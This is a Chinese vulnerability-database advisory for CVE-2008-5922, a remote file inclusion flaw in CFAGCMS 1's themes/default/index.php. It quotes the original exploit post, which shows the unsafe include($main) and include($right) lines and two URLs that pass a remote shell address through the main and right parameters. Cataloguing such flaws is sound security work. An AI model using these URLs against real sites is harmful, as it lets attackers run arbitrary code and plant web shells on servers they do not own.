cfagcms 'themes/default/index.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117030 漏洞类型 代码注入
发布时间 2008-12-14 更新时间 2009-04-04
CVE编号 CVE-2008-5922 CNNVD-ID CNNVD-200901-244
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7459
https://cxsecurity.com/issue/WLB-2009010176
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-244
|漏洞详情
CantFindAGamingCMS(CFAGCMS)1版本中的themes/default/index.php存在多个PHP远程文件包含漏洞。远程攻击者可以借助(1)主要的和(2)正确的参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
Author : BeyazKurt - Bey4zKurt@Gmail.Com

Script : CFAGCMS
Download : http://sourceforge.net/project/showfiles.php?group_id=197936

Vuln :

Page themes/default/index.php, Line 15-16 :

<?php include($main);?>
<?php include($right);?>

Site.Com/cfagcms/themes/default/index.php?main=SHELL
Site.Com/cfagcms/themes/default/index.php?right=SHELL

SHQÄ°PTAR!
Siyasetle ilgili bişi söliyimmi :p
 
FENERBAHÇEE (H)

# milw0rm.com [2008-12-14]
|参考资料

来源:BID
名称:32817
链接:http://www.securityfocus.com/bid/32817
来源:BUGTRAQ
名称:20081214CFAGCMSRemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/499213/100/0/threaded
来源:MILW0RM
名称:7459
链接:http://www.milw0rm.com/exploits/7459
来源:MISC
链接:http://www.bugreport.ir/index_58.htm
来源:SREASON
名称:4926
链接:http://securityreason.com/securityalert/4926